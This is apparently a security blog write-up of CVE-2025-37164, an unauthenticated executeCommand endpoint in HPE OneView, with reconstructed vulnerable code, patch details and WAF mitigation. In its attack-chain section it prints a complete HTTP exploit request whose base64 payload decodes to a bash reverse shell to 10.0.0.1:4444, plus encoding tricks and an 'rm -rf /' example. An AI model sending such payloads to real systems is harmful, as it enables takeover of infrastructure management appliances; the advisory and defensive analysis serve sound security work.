HPE OneView RCE: One View to Rule Them All (and the Shell)

In the world of enterprise infrastructure, HPE OneView is the crown jewel. It is an infrastructure management appliance—software that controls the physical hardware. It manages servers, storage arrays, and networking fabrics. It spins up bare-metal servers, configures firmware, and handles the cooling. If you control OneView, you don't just own a server; you own the building blocks of the data center.

Usually, breaking into an appliance like this requires a complex chain: bypass the login, find a memory leak, corrupt the heap, and pray the ROP chain holds together. It's an art form.

But CVE-2025-37164 is not art. It is a tragedy. It turns out that while security teams were busy hardening the front door with MFA and VPNs, the developers left a side window wide open. Specifically, a REST API endpoint designed to execute shell commands was left accessible without authentication. It's the digital equivalent of a bank vault that opens if you just ask nicely.

The vulnerability lies in the API endpoint /rest/id-pools/executeCommand. If you are a developer, the name alone should make your blood run cold. Why does an endpoint named executeCommand exist in a production REST API? And why is it exposed to the internet?

This endpoint appears to be a vestige of testing or internal debugging functionality that was never stripped from the release build. The application logic fails to perform two critical checks:

1. Authentication: It does not verify if the user is logged in. The Spring Security (or equivalent filter chain) configuration for this specific path was either missing or explicitly set to permitAll.
2. Input Sanitization: It takes a user-supplied string and passes it directly to a system shell execution context.

This is a textbook Command Injection (CWE-78), but it's actually worse. Usually, command injection involves tricking a legitimate utility (like ping or grep) into running extra commands via delimiters like ; or &&. Here, the endpoint isn't a wrapper for a utility; it is a direct interface to the shell. You aren't injecting a command; you are simply requesting one.

While the exact proprietary source code isn't public, the behavior of the endpoint allows us to reconstruct the vulnerable logic with high certainty. It likely resembles a standard Java Controller handling a PUT request.

The Vulnerable Logic (Reconstructed):

@RestController
@RequestMapping("/rest/id-pools")
public class IdPoolController {
 
    // VULNERABILITY: No @PreAuthorize check here!
    @PutMapping("/executeCommand")
    public ResponseEntity<String> execute(@RequestBody CommandRequest request) {
        try {
            // THE HORROR: Direct shell execution of user input
            Process p = Runtime.getRuntime().exec(request.getCmd());
            p.waitFor();
            return ResponseEntity.ok("Command executed.");
        } catch (Exception e) {
            return ResponseEntity.status(500).body("Error");
        }
    }
}

The Fix:

HPE's remediation wasn't just to fix the code; they effectively nuked the endpoint. In the hotfix and version 11.00, the routing to this path is removed or blocked entirely. If you cannot remove the code, the standard mitigation in code would be:

// MITIGATION: Remove the endpoint or secure it
@PreAuthorize("hasRole('ADMIN')") // 1. Require Auth
@PutMapping("/executeCommand")
public ResponseEntity<String> execute(@RequestBody CommandRequest request) {
    // 2. Validate input against a strict allowlist
    if (!ALLOWED_COMMANDS.contains(request.getCmd())) {
         throw new SecurityException("Nice try.");
    }
    // ...
}

The actual patch deployed by HPE involves an HTTP rewrite rule to reject requests to this URI before they even hit the application logic, which is a faster way to stop the bleeding without recompiling the massive OneView JARs.

Exploiting this is trivially easy, script-kiddie friendly, and highly reliable. The attacker only needs to send a PUT request. However, there is a small catch: the JSON parser and the underlying shell execution environment can be finicky about spaces and quotes.

The Attack Chain:

1. Target Selection: Identify the OneView instance (usually port 443).
2. Payload Construction: The payload is a JSON object {"cmd": "<COMMAND>"}. To bypass potential whitespace issues in the Runtime.exec tokenizer, attackers often use the Internal Field Separator (${IFS}) or base64 encoding.

The Exploit Request:

PUT /rest/id-pools/executeCommand HTTP/1.1
Host: target-oneview.local
Content-Type: application/json
 
{
  "cmd": "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}",
  "result": false
}

In the example above, the attacker sends a base64 encoded reverse shell (bash -i >& /dev/tcp/10.0.0.1/4444 0>&1) to avoid dealing with special characters. The server decodes it and executes it, granting the attacker an interactive shell.

> [!NOTE] > Re-exploitation Potential: Even if the endpoint is blocked, researchers will likely look for other endpoints in the /rest/id-pools/ controller. Often, if a developer forgets auth on one method in a controller, they forgot it on the whole class.

Why is this a CVSS 10.0? Because OneView is an infrastructure concentrator.

1. Confidentiality: The attacker can dump the database containing credentials for all managed devices (iLOs, OA, interconnects). They now have keys to every server in your rack.
2. Integrity: They can flash malicious firmware onto network cards or BIOS, creating a persistent backdoor that survives OS reinstalls (a "bootkit").
3. Availability: rm -rf / on the OneView appliance causes a management blackout. Worse, they could script the power-off sequence for every connected blade server.

Since this is being actively exploited (CISA KEV), ransomware groups are likely using it as an initial access vector to encrypt the management plane before moving laterally to the production data.

If you are running OneView older than version 11.00, you are currently exposed. The remediation path is straightforward but urgent.

Immediate Actions:

1. Upgrade: Move to HPE OneView 11.00 or higher immediately. This version removes the vulnerability entirely.
2. Hotfix: If you cannot do a full version migration (perhaps due to hardware compatibility), apply Hotfix Z7550-98077. This is available for versions 5.20 through 10.20.

Defense in Depth:

If you cannot patch right this second, you must block the attack vector at the network layer. Configure your WAF or load balancer to drop any request matching:

• Method: PUT
• URI: /rest/id-pools/executeCommand

Unlike many complex deserialization bugs, this one is easy to signature. Do it now, or explain to your CISO why the datacenter just went dark.